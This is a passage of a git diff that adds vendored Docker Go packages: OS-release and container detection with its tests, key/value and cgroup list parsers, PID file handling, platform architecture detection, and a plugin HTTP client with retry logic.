+			`NAME="Ubuntu"
+VERSION="14.04, Trusty Tahr"
+ID=ubuntu
+ID_LIKE=debian
+VERSION_ID="14.04"
+HOME_URL="http://www.ubuntu.com/"
+SUPPORT_URL="http://help.ubuntu.com/"
+BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"`,
+			"Linux",
+		},
+		{
+			`NAME=Gentoo
+ID=gentoo
+PRETTY_NAME="Gentoo/Linux"
+ANSI_COLOR="1;32"
+HOME_URL="http://www.gentoo.org/"
+SUPPORT_URL="http://www.gentoo.org/main/en/support.xml"
+BUG_REPORT_URL="https://bugs.gentoo.org/"
+`,
+			"Gentoo/Linux",
+		},
+		{
+			`NAME="Ubuntu"
+VERSION="14.04, Trusty Tahr"
+ID=ubuntu
+ID_LIKE=debian
+PRETTY_NAME="Ubuntu 14.04 LTS"
+VERSION_ID="14.04"
+HOME_URL="http://www.ubuntu.com/"
+SUPPORT_URL="http://help.ubuntu.com/"
+BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"`,
+			"Ubuntu 14.04 LTS",
+		},
+		{
+			`NAME="Ubuntu"
+VERSION="14.04, Trusty Tahr"
+ID=ubuntu
+ID_LIKE=debian
+PRETTY_NAME='Ubuntu 14.04 LTS'`,
+			"Ubuntu 14.04 LTS",
+		},
+		{
+			`PRETTY_NAME=Source
+NAME="Source Mage"`,
+			"Source",
+		},
+		{
+			`PRETTY_NAME=Source
+PRETTY_NAME="Source Mage"`,
+			"Source Mage",
+		},
+	}
+
+	dir := os.TempDir()
+	etcOsRelease = filepath.Join(dir, "etcOsRelease")
+
+	defer func() {
+		os.Remove(etcOsRelease)
+		etcOsRelease = backup
+	}()
+
+	for _, elt := range invalids {
+		if err := ioutil.WriteFile(etcOsRelease, []byte(elt.content), 0600); err != nil {
+			t.Fatalf("failed to write to %s: %v", etcOsRelease, err)
+		}
+		s, err := GetOperatingSystem()
+		if err == nil || err.Error() != elt.errorExpected {
+			t.Fatalf("Expected an error %q, got %q (err: %v)", elt.errorExpected, s, err)
+		}
+	}
+
+	for _, elt := range valids {
+		if err := ioutil.WriteFile(etcOsRelease, []byte(elt.content), 0600); err != nil {
+			t.Fatalf("failed to write to %s: %v", etcOsRelease, err)
+		}
+		s, err := GetOperatingSystem()
+		if err != nil || s != elt.expected {
+			t.Fatalf("Expected %q, got %q (err: %v)", elt.expected, s, err)
+		}
+	}
+}
+
+func TestIsContainerized(t *testing.T) {
+	var (
+		backup                                = proc1Cgroup
+		nonContainerizedProc1Cgroupsystemd226 = []byte(`9:memory:/init.scope
+8:net_cls,net_prio:/
+7:cpuset:/
+6:freezer:/
+5:devices:/init.scope
+4:blkio:/init.scope
+3:cpu,cpuacct:/init.scope
+2:perf_event:/
+1:name=systemd:/init.scope
+`)
+		nonContainerizedProc1Cgroup = []byte(`14:name=systemd:/
+13:hugetlb:/
+12:net_prio:/
+11:perf_event:/
+10:bfqio:/
+9:blkio:/
+8:net_cls:/
+7:freezer:/
+6:devices:/
+5:memory:/
+4:cpuacct:/
+3:cpu:/
+2:cpuset:/
+`)
+		containerizedProc1Cgroup = []byte(`9:perf_event:/docker/3cef1b53c50b0fa357d994f8a1a8cd783c76bbf4f5dd08b226e38a8bd331338d
+8:blkio:/docker/3cef1b53c50b0fa357d994f8a1a8cd783c76bbf4f5dd08b226e38a8bd331338d
+7:net_cls:/
+6:freezer:/docker/3cef1b53c50b0fa357d994f8a1a8cd783c76bbf4f5dd08b226e38a8bd331338d
+5:devices:/docker/3cef1b53c50b0fa357d994f8a1a8cd783c76bbf4f5dd08b226e38a8bd331338d
+4:memory:/docker/3cef1b53c50b0fa357d994f8a1a8cd783c76bbf4f5dd08b226e38a8bd331338d
+3:cpuacct:/docker/3cef1b53c50b0fa357d994f8a1a8cd783c76bbf4f5dd08b226e38a8bd331338d
+2:cpu:/docker/3cef1b53c50b0fa357d994f8a1a8cd783c76bbf4f5dd08b226e38a8bd331338d
+1:cpuset:/`)
+	)
+
+	dir := os.TempDir()
+	proc1Cgroup = filepath.Join(dir, "proc1Cgroup")
+
+	defer func() {
+		os.Remove(proc1Cgroup)
+		proc1Cgroup = backup
+	}()
+
+	if err := ioutil.WriteFile(proc1Cgroup, nonContainerizedProc1Cgroup, 0600); err != nil {
+		t.Fatalf("failed to write to %s: %v", proc1Cgroup, err)
+	}
+	inContainer, err := IsContainerized()
+	if err != nil {
+		t.Fatal(err)
+	}
+	if inContainer {
+		t.Fatal("Wrongly assuming containerized")
+	}
+
+	if err := ioutil.WriteFile(proc1Cgroup, nonContainerizedProc1Cgroupsystemd226, 0600); err != nil {
+		t.Fatalf("failed to write to %s: %v", proc1Cgroup, err)
+	}
+	inContainer, err = IsContainerized()
+	if err != nil {
+		t.Fatal(err)
+	}
+	if inContainer {
+		t.Fatal("Wrongly assuming containerized for systemd /init.scope cgroup layout")
+	}
+
+	if err := ioutil.WriteFile(proc1Cgroup, containerizedProc1Cgroup, 0600); err != nil {
+		t.Fatalf("failed to write to %s: %v", proc1Cgroup, err)
+	}
+	inContainer, err = IsContainerized()
+	if err != nil {
+		t.Fatal(err)
+	}
+	if !inContainer {
+		t.Fatal("Wrongly assuming non-containerized")
+	}
+}
+
+func TestOsReleaseFallback(t *testing.T) {
+	var backup = etcOsRelease
+	var altBackup = altOsRelease
+	dir := os.TempDir()
+	etcOsRelease = filepath.Join(dir, "etcOsRelease")
+	altOsRelease = filepath.Join(dir, "altOsRelease")
+
+	defer func() {
+		os.Remove(dir)
+		etcOsRelease = backup
+		altOsRelease = altBackup
+	}()
+	content := `NAME=Gentoo
+ID=gentoo
+PRETTY_NAME="Gentoo/Linux"
+ANSI_COLOR="1;32"
+HOME_URL="http://www.gentoo.org/"
+SUPPORT_URL="http://www.gentoo.org/main/en/support.xml"
+BUG_REPORT_URL="https://bugs.gentoo.org/"
+`
+	if err := ioutil.WriteFile(altOsRelease, []byte(content), 0600); err != nil {
+		t.Fatalf("failed to write to %s: %v", etcOsRelease, err)
+	}
+	s, err := GetOperatingSystem()
+	if err != nil || s != "Gentoo/Linux" {
+		t.Fatalf("Expected %q, got %q (err: %v)", "Gentoo/Linux", s, err)
+	}
+}
diff --git a/vendor/github.com/docker/docker/pkg/parsers/operatingsystem/operatingsystem_windows.go b/vendor/github.com/docker/docker/pkg/parsers/operatingsystem/operatingsystem_windows.go
new file mode 100644
index 0000000000..3c86b6af9c
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/parsers/operatingsystem/operatingsystem_windows.go
@@ -0,0 +1,49 @@
+package operatingsystem
+
+import (
+	"syscall"
+	"unsafe"
+)
+
+// See https://code.google.com/p/go/source/browse/src/pkg/mime/type_windows.go?r=d14520ac25bf6940785aabb71f5be453a286f58c
+// for a similar sample
+
+// GetOperatingSystem gets the name of the current operating system.
+func GetOperatingSystem() (string, error) {
+
+	var h syscall.Handle
+
+	// Default return value
+	ret := "Unknown Operating System"
+
+	if err := syscall.RegOpenKeyEx(syscall.HKEY_LOCAL_MACHINE,
+		syscall.StringToUTF16Ptr(`SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\`),
+		0,
+		syscall.KEY_READ,
+		&h); err != nil {
+		return ret, err
+	}
+	defer syscall.RegCloseKey(h)
+
+	var buf [1 << 10]uint16
+	var typ uint32
+	n := uint32(len(buf) * 2) // api expects array of bytes, not uint16
+
+	if err := syscall.RegQueryValueEx(h,
+		syscall.StringToUTF16Ptr("ProductName"),
+		nil,
+		&typ,
+		(*byte)(unsafe.Pointer(&buf[0])),
+		&n); err != nil {
+		return ret, err
+	}
+	ret = syscall.UTF16ToString(buf[:])
+
+	return ret, nil
+}
+
+// IsContainerized returns true if we are running inside a container.
+// No-op on Windows, always returns false.
+func IsContainerized() (bool, error) {
+	return false, nil
+}
diff --git a/vendor/github.com/docker/docker/pkg/parsers/parsers.go b/vendor/github.com/docker/docker/pkg/parsers/parsers.go
new file mode 100644
index 0000000000..acc897168f
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/parsers/parsers.go
@@ -0,0 +1,69 @@
+// Package parsers provides helper functions to parse and validate different type
+// of string. It can be hosts, unix addresses, tcp addresses, filters, kernel
+// operating system versions.
+package parsers
+
+import (
+	"fmt"
+	"strconv"
+	"strings"
+)
+
+// ParseKeyValueOpt parses and validates the specified string as a key/value pair (key=value)
+func ParseKeyValueOpt(opt string) (string, string, error) {
+	parts := strings.SplitN(opt, "=", 2)
+	if len(parts) != 2 {
+		return "", "", fmt.Errorf("Unable to parse key/value option: %s", opt)
+	}
+	return strings.TrimSpace(parts[0]), strings.TrimSpace(parts[1]), nil
+}
+
+// ParseUintList parses and validates the specified string as the value
+// found in some cgroup file (e.g. `cpuset.cpus`, `cpuset.mems`), which could be
+// one of the formats below. Note that duplicates are actually allowed in the
+// input string. It returns a `map[int]bool` with available elements from `val`
+// set to `true`.
+// Supported formats:
+//     7
+//     1-6
+//     0,3-4,7,8-10
+//     0-0,0,1-7
+//     03,1-3      <- this is gonna get parsed as [1,2,3]
+//     3,2,1
+//     0-2,3,1
+func ParseUintList(val string) (map[int]bool, error) {
+	if val == "" {
+		return map[int]bool{}, nil
+	}
+
+	availableInts := make(map[int]bool)
+	split := strings.Split(val, ",")
+	errInvalidFormat := fmt.Errorf("invalid format: %s", val)
+
+	for _, r := range split {
+		if !strings.Contains(r, "-") {
+			v, err := strconv.Atoi(r)
+			if err != nil {
+				return nil, errInvalidFormat
+			}
+			availableInts[v] = true
+		} else {
+			split := strings.SplitN(r, "-", 2)
+			min, err := strconv.Atoi(split[0])
+			if err != nil {
+				return nil, errInvalidFormat
+			}
+			max, err := strconv.Atoi(split[1])
+			if err != nil {
+				return nil, errInvalidFormat
+			}
+			if max < min {
+				return nil, errInvalidFormat
+			}
+			for i := min; i <= max; i++ {
+				availableInts[i] = true
+			}
+		}
+	}
+	return availableInts, nil
+}
diff --git a/vendor/github.com/docker/docker/pkg/parsers/parsers_test.go b/vendor/github.com/docker/docker/pkg/parsers/parsers_test.go
new file mode 100644
index 0000000000..7f19e90279
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/parsers/parsers_test.go
@@ -0,0 +1,70 @@
+package parsers
+
+import (
+	"reflect"
+	"testing"
+)
+
+func TestParseKeyValueOpt(t *testing.T) {
+	invalids := map[string]string{
+		"":    "Unable to parse key/value option: ",
+		"key": "Unable to parse key/value option: key",
+	}
+	for invalid, expectedError := range invalids {
+		if _, _, err := ParseKeyValueOpt(invalid); err == nil || err.Error() != expectedError {
+			t.Fatalf("Expected error %v for %v, got %v", expectedError, invalid, err)
+		}
+	}
+	valids := map[string][]string{
+		"key=value":               {"key", "value"},
+		" key = value ":           {"key", "value"},
+		"key=value1=value2":       {"key", "value1=value2"},
+		" key = value1 = value2 ": {"key", "value1 = value2"},
+	}
+	for valid, expectedKeyValue := range valids {
+		key, value, err := ParseKeyValueOpt(valid)
+		if err != nil {
+			t.Fatal(err)
+		}
+		if key != expectedKeyValue[0] || value != expectedKeyValue[1] {
+			t.Fatalf("Expected {%v: %v} got {%v: %v}", expectedKeyValue[0], expectedKeyValue[1], key, value)
+		}
+	}
+}
+
+func TestParseUintList(t *testing.T) {
+	valids := map[string]map[int]bool{
+		"":             {},
+		"7":            {7: true},
+		"1-6":          {1: true, 2: true, 3: true, 4: true, 5: true, 6: true},
+		"0-7":          {0: true, 1: true, 2: true, 3: true, 4: true, 5: true, 6: true, 7: true},
+		"0,3-4,7,8-10": {0: true, 3: true, 4: true, 7: true, 8: true, 9: true, 10: true},
+		"0-0,0,1-4":    {0: true, 1: true, 2: true, 3: true, 4: true},
+		"03,1-3":       {1: true, 2: true, 3: true},
+		"3,2,1":        {1: true, 2: true, 3: true},
+		"0-2,3,1":      {0: true, 1: true, 2: true, 3: true},
+	}
+	for k, v := range valids {
+		out, err := ParseUintList(k)
+		if err != nil {
+			t.Fatalf("Expected not to fail, got %v", err)
+		}
+		if !reflect.DeepEqual(out, v) {
+			t.Fatalf("Expected %v, got %v", v, out)
+		}
+	}
+
+	invalids := []string{
+		"this",
+		"1--",
+		"1-10,,10",
+		"10-1",
+		"-1",
+		"-1,0",
+	}
+	for _, v := range invalids {
+		if out, err := ParseUintList(v); err == nil {
+			t.Fatalf("Expected failure with %s but got %v", v, out)
+		}
+	}
+}
diff --git a/vendor/github.com/docker/docker/pkg/pidfile/pidfile.go b/vendor/github.com/docker/docker/pkg/pidfile/pidfile.go
new file mode 100644
index 0000000000..d832fea7a2
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/pidfile/pidfile.go
@@ -0,0 +1,56 @@
+// Package pidfile provides structure and helper functions to create and remove
+// PID file. A PID file is usually a file used to store the process ID of a
+// running process.
+package pidfile
+
+import (
+	"fmt"
+	"io/ioutil"
+	"os"
+	"path/filepath"
+	"strconv"
+	"strings"
+
+	"github.com/docker/docker/pkg/system"
+)
+
+// PIDFile is a file used to store the process ID of a running process.
+type PIDFile struct {
+	path string
+}
+
+func checkPIDFileAlreadyExists(path string) error {
+	if pidByte, err := ioutil.ReadFile(path); err == nil {
+		pidString := strings.TrimSpace(string(pidByte))
+		if pid, err := strconv.Atoi(pidString); err == nil {
+			if processExists(pid) {
+				return fmt.Errorf("pid file found, ensure docker is not running or delete %s", path)
+			}
+		}
+	}
+	return nil
+}
+
+// New creates a PIDfile using the specified path.
+func New(path string) (*PIDFile, error) {
+	if err := checkPIDFileAlreadyExists(path); err != nil {
+		return nil, err
+	}
+	// Note MkdirAll returns nil if a directory already exists
+	if err := system.MkdirAll(filepath.Dir(path), os.FileMode(0755)); err != nil {
+		return nil, err
+	}
+	if err := ioutil.WriteFile(path, []byte(fmt.Sprintf("%d", os.Getpid())), 0644); err != nil {
+		return nil, err
+	}
+
+	return &PIDFile{path: path}, nil
+}
+
+// Remove removes the PIDFile.
+func (file PIDFile) Remove() error {
+	if err := os.Remove(file.path); err != nil {
+		return err
+	}
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/pkg/pidfile/pidfile_darwin.go b/vendor/github.com/docker/docker/pkg/pidfile/pidfile_darwin.go
new file mode 100644
index 0000000000..5c1cd7ab85
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/pidfile/pidfile_darwin.go
@@ -0,0 +1,18 @@
+// +build darwin
+
+package pidfile
+
+import (
+	"syscall"
+)
+
+func processExists(pid int) bool {
+	// OS X does not have a proc filesystem.
+	// Use kill -0 pid to judge if the process exists.
+	err := syscall.Kill(pid, 0)
+	if err != nil {
+		return false
+	}
+
+	return true
+}
diff --git a/vendor/github.com/docker/docker/pkg/pidfile/pidfile_test.go b/vendor/github.com/docker/docker/pkg/pidfile/pidfile_test.go
new file mode 100644
index 0000000000..73e8af76db
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/pidfile/pidfile_test.go
@@ -0,0 +1,38 @@
+package pidfile
+
+import (
+	"io/ioutil"
+	"os"
+	"path/filepath"
+	"testing"
+)
+
+func TestNewAndRemove(t *testing.T) {
+	dir, err := ioutil.TempDir(os.TempDir(), "test-pidfile")
+	if err != nil {
+		t.Fatal("Could not create test directory")
+	}
+
+	path := filepath.Join(dir, "testfile")
+	file, err := New(path)
+	if err != nil {
+		t.Fatal("Could not create test file", err)
+	}
+
+	_, err = New(path)
+	if err == nil {
+		t.Fatal("Test file creation not blocked")
+	}
+
+	if err := file.Remove(); err != nil {
+		t.Fatal("Could not delete created test file")
+	}
+}
+
+func TestRemoveInvalidPath(t *testing.T) {
+	file := PIDFile{path: filepath.Join("foo", "bar")}
+
+	if err := file.Remove(); err == nil {
+		t.Fatal("Non-existing file doesn't give an error on delete")
+	}
+}
diff --git a/vendor/github.com/docker/docker/pkg/pidfile/pidfile_unix.go b/vendor/github.com/docker/docker/pkg/pidfile/pidfile_unix.go
new file mode 100644
index 0000000000..1bf5221e3b
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/pidfile/pidfile_unix.go
@@ -0,0 +1,16 @@
+// +build !windows,!darwin
+
+package pidfile
+
+import (
+	"os"
+	"path/filepath"
+	"strconv"
+)
+
+func processExists(pid int) bool {
+	if _, err := os.Stat(filepath.Join("/proc", strconv.Itoa(pid))); err == nil {
+		return true
+	}
+	return false
+}
diff --git a/vendor/github.com/docker/docker/pkg/pidfile/pidfile_windows.go b/vendor/github.com/docker/docker/pkg/pidfile/pidfile_windows.go
new file mode 100644
index 0000000000..ae489c627a
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/pidfile/pidfile_windows.go
@@ -0,0 +1,23 @@
+package pidfile
+
+import "syscall"
+
+const (
+	processQueryLimitedInformation = 0x1000
+
+	stillActive = 259
+)
+
+func processExists(pid int) bool {
+	h, err := syscall.OpenProcess(processQueryLimitedInformation, false, uint32(pid))
+	if err != nil {
+		return false
+	}
+	var c uint32
+	err = syscall.GetExitCodeProcess(h, &c)
+	syscall.Close(h)
+	if err != nil {
+		return c == stillActive
+	}
+	return true
+}
diff --git a/vendor/github.com/docker/docker/pkg/platform/architecture_linux.go b/vendor/github.com/docker/docker/pkg/platform/architecture_linux.go
new file mode 100644
index 0000000000..2cdc2c5918
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/platform/architecture_linux.go
@@ -0,0 +1,16 @@
+// Package platform provides helper function to get the runtime architecture
+// for different platforms.
+package platform
+
+import (
+	"syscall"
+)
+
+// runtimeArchitecture gets the name of the current architecture (x86, x86_64, …)
+func runtimeArchitecture() (string, error) {
+	utsname := &syscall.Utsname{}
+	if err := syscall.Uname(utsname); err != nil {
+		return "", err
+	}
+	return charsToString(utsname.Machine), nil
+}
diff --git a/vendor/github.com/docker/docker/pkg/platform/architecture_unix.go b/vendor/github.com/docker/docker/pkg/platform/architecture_unix.go
new file mode 100644
index 0000000000..45bbcf1535
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/platform/architecture_unix.go
@@ -0,0 +1,20 @@
+// +build freebsd solaris darwin
+
+// Package platform provides helper function to get the runtime architecture
+// for different platforms.
+package platform
+
+import (
+	"os/exec"
+	"strings"
+)
+
+// runtimeArchitecture gets the name of the current architecture (x86, x86_64, i86pc, sun4v, ...)
+func runtimeArchitecture() (string, error) {
+	cmd := exec.Command("/usr/bin/uname", "-m")
+	machine, err := cmd.Output()
+	if err != nil {
+		return "", err
+	}
+	return strings.TrimSpace(string(machine)), nil
+}
diff --git a/vendor/github.com/docker/docker/pkg/platform/architecture_windows.go b/vendor/github.com/docker/docker/pkg/platform/architecture_windows.go
new file mode 100644
index 0000000000..c5f684ddfa
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/platform/architecture_windows.go
@@ -0,0 +1,60 @@
+package platform
+
+import (
+	"fmt"
+	"syscall"
+	"unsafe"
+
+	"golang.org/x/sys/windows"
+)
+
+var (
+	modkernel32       = windows.NewLazySystemDLL("kernel32.dll")
+	procGetSystemInfo = modkernel32.NewProc("GetSystemInfo")
+)
+
+// see http://msdn.microsoft.com/en-us/library/windows/desktop/ms724958(v=vs.85).aspx
+type systeminfo struct {
+	wProcessorArchitecture      uint16
+	wReserved                   uint16
+	dwPageSize                  uint32
+	lpMinimumApplicationAddress uintptr
+	lpMaximumApplicationAddress uintptr
+	dwActiveProcessorMask       uintptr
+	dwNumberOfProcessors        uint32
+	dwProcessorType             uint32
+	dwAllocationGranularity     uint32
+	wProcessorLevel             uint16
+	wProcessorRevision          uint16
+}
+
+// Constants
+const (
+	ProcessorArchitecture64   = 9 // PROCESSOR_ARCHITECTURE_AMD64
+	ProcessorArchitectureIA64 = 6 // PROCESSOR_ARCHITECTURE_IA64
+	ProcessorArchitecture32   = 0 // PROCESSOR_ARCHITECTURE_INTEL
+	ProcessorArchitectureArm  = 5 // PROCESSOR_ARCHITECTURE_ARM
+)
+
+// runtimeArchitecture gets the name of the current architecture (x86, x86_64, …)
+func runtimeArchitecture() (string, error) {
+	var sysinfo systeminfo
+	syscall.Syscall(procGetSystemInfo.Addr(), 1, uintptr(unsafe.Pointer(&sysinfo)), 0, 0)
+	switch sysinfo.wProcessorArchitecture {
+	case ProcessorArchitecture64, ProcessorArchitectureIA64:
+		return "x86_64", nil
+	case ProcessorArchitecture32:
+		return "i686", nil
+	case ProcessorArchitectureArm:
+		return "arm", nil
+	default:
+		return "", fmt.Errorf("Unknown processor architecture")
+	}
+}
+
+// NumProcs returns the number of processors on the system
+func NumProcs() uint32 {
+	var sysinfo systeminfo
+	syscall.Syscall(procGetSystemInfo.Addr(), 1, uintptr(unsafe.Pointer(&sysinfo)), 0, 0)
+	return sysinfo.dwNumberOfProcessors
+}
diff --git a/vendor/github.com/docker/docker/pkg/platform/platform.go b/vendor/github.com/docker/docker/pkg/platform/platform.go
new file mode 100644
index 0000000000..e4b03122f4
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/platform/platform.go
@@ -0,0 +1,23 @@
+package platform
+
+import (
+	"runtime"
+
+	"github.com/Sirupsen/logrus"
+)
+
+var (
+	// Architecture holds the runtime architecture of the process.
+	Architecture string
+	// OSType holds the runtime operating system type (Linux, …) of the process.
+	OSType string
+)
+
+func init() {
+	var err error
+	Architecture, err = runtimeArchitecture()
+	if err != nil {
+		logrus.Errorf("Could not read system architecture info: %v", err)
+	}
+	OSType = runtime.GOOS
+}
diff --git a/vendor/github.com/docker/docker/pkg/platform/utsname_int8.go b/vendor/github.com/docker/docker/pkg/platform/utsname_int8.go
new file mode 100644
index 0000000000..5dcbadfdfe
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/platform/utsname_int8.go
@@ -0,0 +1,18 @@
+// +build linux,386 linux,amd64 linux,arm64
+// see golang's sources src/syscall/ztypes_linux_*.go that use int8
+
+package platform
+
+// Convert the OS/ARCH-specific utsname.Machine to string
+// given as an array of signed int8
+func charsToString(ca [65]int8) string {
+	s := make([]byte, len(ca))
+	var lens int
+	for ; lens < len(ca); lens++ {
+		if ca[lens] == 0 {
+			break
+		}
+		s[lens] = uint8(ca[lens])
+	}
+	return string(s[0:lens])
+}
diff --git a/vendor/github.com/docker/docker/pkg/platform/utsname_uint8.go b/vendor/github.com/docker/docker/pkg/platform/utsname_uint8.go
new file mode 100644
index 0000000000..c9875cf6e6
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/platform/utsname_uint8.go
@@ -0,0 +1,18 @@
+// +build linux,arm linux,ppc64 linux,ppc64le s390x
+// see golang's sources src/syscall/ztypes_linux_*.go that use uint8
+
+package platform
+
+// Convert the OS/ARCH-specific utsname.Machine to string
+// given as an array of unsigned uint8
+func charsToString(ca [65]uint8) string {
+	s := make([]byte, len(ca))
+	var lens int
+	for ; lens < len(ca); lens++ {
+		if ca[lens] == 0 {
+			break
+		}
+		s[lens] = ca[lens]
+	}
+	return string(s[0:lens])
+}
diff --git a/vendor/github.com/docker/docker/pkg/plugingetter/getter.go b/vendor/github.com/docker/docker/pkg/plugingetter/getter.go
new file mode 100644
index 0000000000..dde5f66035
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/plugingetter/getter.go
@@ -0,0 +1,35 @@
+package plugingetter
+
+import "github.com/docker/docker/pkg/plugins"
+
+const (
+	// LOOKUP doesn't update RefCount
+	LOOKUP = 0
+	// ACQUIRE increments RefCount
+	ACQUIRE = 1
+	// RELEASE decrements RefCount
+	RELEASE = -1
+)
+
+// CompatPlugin is a abstraction to handle both v2(new) and v1(legacy) plugins.
+type CompatPlugin interface {
+	Client() *plugins.Client
+	Name() string
+	BasePath() string
+	IsV1() bool
+}
+
+// CountedPlugin is a plugin which is reference counted.
+type CountedPlugin interface {
+	Acquire()
+	Release()
+	CompatPlugin
+}
+
+// PluginGetter is the interface implemented by Store
+type PluginGetter interface {
+	Get(name, capability string, mode int) (CompatPlugin, error)
+	GetAllByCap(capability string) ([]CompatPlugin, error)
+	GetAllManagedPluginsByCap(capability string) []CompatPlugin
+	Handle(capability string, callback func(string, *plugins.Client))
+}
diff --git a/vendor/github.com/docker/docker/pkg/plugins/client.go b/vendor/github.com/docker/docker/pkg/plugins/client.go
new file mode 100644
index 0000000000..e8e730eb58
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/plugins/client.go
@@ -0,0 +1,205 @@
+package plugins
+
+import (
+	"bytes"
+	"encoding/json"
+	"io"
+	"io/ioutil"
+	"net/http"
+	"net/url"
+	"time"
+
+	"github.com/Sirupsen/logrus"
+	"github.com/docker/docker/pkg/plugins/transport"
+	"github.com/docker/go-connections/sockets"
+	"github.com/docker/go-connections/tlsconfig"
+)
+
+const (
+	defaultTimeOut = 30
+)
+
+func newTransport(addr string, tlsConfig *tlsconfig.Options) (transport.Transport, error) {
+	tr := &http.Transport{}
+
+	if tlsConfig != nil {
+		c, err := tlsconfig.Client(*tlsConfig)
+		if err != nil {
+			return nil, err
+		}
+		tr.TLSClientConfig = c
+	}
+
+	u, err := url.Parse(addr)
+	if err != nil {
+		return nil, err
+	}
+	socket := u.Host
+	if socket == "" {
+		// valid local socket addresses have the host empty.
+		socket = u.Path
+	}
+	if err := sockets.ConfigureTransport(tr, u.Scheme, socket); err != nil {
+		return nil, err
+	}
+	scheme := httpScheme(u)
+
+	return transport.NewHTTPTransport(tr, scheme, socket), nil
+}
+
+// NewClient creates a new plugin client (http).
+func NewClient(addr string, tlsConfig *tlsconfig.Options) (*Client, error) {
+	clientTransport, err := newTransport(addr, tlsConfig)
+	if err != nil {
+		return nil, err
+	}
+	return newClientWithTransport(clientTransport, 0), nil
+}
+
+// NewClientWithTimeout creates a new plugin client (http).
+func NewClientWithTimeout(addr string, tlsConfig *tlsconfig.Options, timeoutInSecs int) (*Client, error) {
+	clientTransport, err := newTransport(addr, tlsConfig)
+	if err != nil {
+		return nil, err
+	}
+	return newClientWithTransport(clientTransport, timeoutInSecs), nil
+}
+
+// newClientWithTransport creates a new plugin client with a given transport.
+func newClientWithTransport(tr transport.Transport, timeoutInSecs int) *Client {
+	return &Client{
+		http: &http.Client{
+			Transport: tr,
+			Timeout:   time.Duration(timeoutInSecs) * time.Second,
+		},
+		requestFactory: tr,
+	}
+}
+
+// Client represents a plugin client.
+type Client struct {
+	http           *http.Client // http client to use
+	requestFactory transport.RequestFactory
+}
+
+// Call calls the specified method with the specified arguments for the plugin.
+// It will retry for 30 seconds if a failure occurs when calling.
+func (c *Client) Call(serviceMethod string, args interface{}, ret interface{}) error {
+	var buf bytes.Buffer
+	if args != nil {
+		if err := json.NewEncoder(&buf).Encode(args); err != nil {
+			return err
+		}
+	}
+	body, err := c.callWithRetry(serviceMethod, &buf, true)
+	if err != nil {
+		return err
+	}
+	defer body.Close()
+	if ret != nil {
+		if err := json.NewDecoder(body).Decode(&ret); err != nil {
+			logrus.Errorf("%s: error reading plugin resp: %v", serviceMethod, err)
+			return err
+		}
+	}
+	return nil
+}
+
+// Stream calls the specified method with the specified arguments for the plugin and returns the response body
+func (c *Client) Stream(serviceMethod string, args interface{}) (io.ReadCloser, error) {
+	var buf bytes.Buffer
+	if err := json.NewEncoder(&buf).Encode(args); err != nil {
+		return nil, err
+	}
+	return c.callWithRetry(serviceMethod, &buf, true)
+}
+
+// SendFile calls the specified method, and passes through the IO stream
+func (c *Client) SendFile(serviceMethod string, data io.Reader, ret interface{}) error {
+	body, err := c.callWithRetry(serviceMethod, data, true)
+	if err != nil {
+		return err
+	}
+	defer body.Close()
+	if err := json.NewDecoder(body).Decode(&ret); err != nil {
+		logrus.Errorf("%s: error reading plugin resp: %v", serviceMethod, err)
+		return err
+	}
+	return nil
+}
+
+func (c *Client) callWithRetry(serviceMethod string, data io.Reader, retry bool) (io.ReadCloser, error) {
+	req, err := c.requestFactory.NewRequest(serviceMethod, data)
+	if err != nil {
+		return nil, err
+	}
+
+	var retries int
+	start := time.Now()
+
+	for {
+		resp, err := c.http.Do(req)
+		if err != nil {
+			if !retry {
+				return nil, err
+			}
+
+			timeOff := backoff(retries)
+			if abort(start, timeOff) {
+				return nil, err
+			}
+			retries++
+			logrus.Warnf("Unable to connect to plugin: %s%s: %v, retrying in %v", req.URL.Host, req.URL.Path, err, timeOff)
+			time.Sleep(timeOff)
+			continue
+		}
+
+		if resp.StatusCode != http.StatusOK {
+			b, err := ioutil.ReadAll(resp.Body)
+			resp.Body.Close()
+			if err != nil {
+				return nil, &statusError{resp.StatusCode, serviceMethod, err.Error()}
+			}
+
+			// Plugins' Response(s) should have an Err field indicating what went
+			// wrong. Try to unmarshal into ResponseErr. Otherwise fallback to just
+			// return the string(body)
+			type responseErr struct {
+				Err string
+			}
+			remoteErr := responseErr{}
+			if err := json.Unmarshal(b, &remoteErr); err == nil {
+				if remoteErr.Err != "" {
+					return nil, &statusError{resp.StatusCode, serviceMethod, remoteErr.Err}
+				}
+			}
+			// old way...
+			return nil, &statusError{resp.StatusCode, serviceMethod, string(b)}
+		}
+		return resp.Body, nil
+	}
+}
+
+func backoff(retries int) time.Duration {
+	b, max := 1, defaultTimeOut
+	for b < max && retries > 0 {
+		b *= 2
+		retries--
+	}
+	if b > max {
+		b = max
+	}
+	return time.Duration(b) * time.Second
+}
+
+func abort(start time.Time, timeOff time.Duration) bool {
+	return timeOff+time.Since(start) >= time.Duration(defaultTimeOut)*time.Second
+}
+
+func httpScheme(u *url.URL) string {
+	scheme := u.Scheme
+	if scheme != "https" {
+		scheme = "http"
+	}
+	return scheme
+}
diff --git a/vendor/github.com/docker/docker/pkg/plugins/client_test.go b/vendor/github.com/docker/docker/pkg/plugins/client_test.go
new file mode 100644
index 0000000000..9faad86a15
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/plugins/client_test.go
@@ -0,0 +1,134 @@
+package plugins
+
+import (
+	"io"
+	"net/http"
+	"net/http/httptest"
+	"net/url"
+	"reflect"
+	"testing"
+	"time"
+
+	"github.com/docker/docker/pkg/plugins/transport"
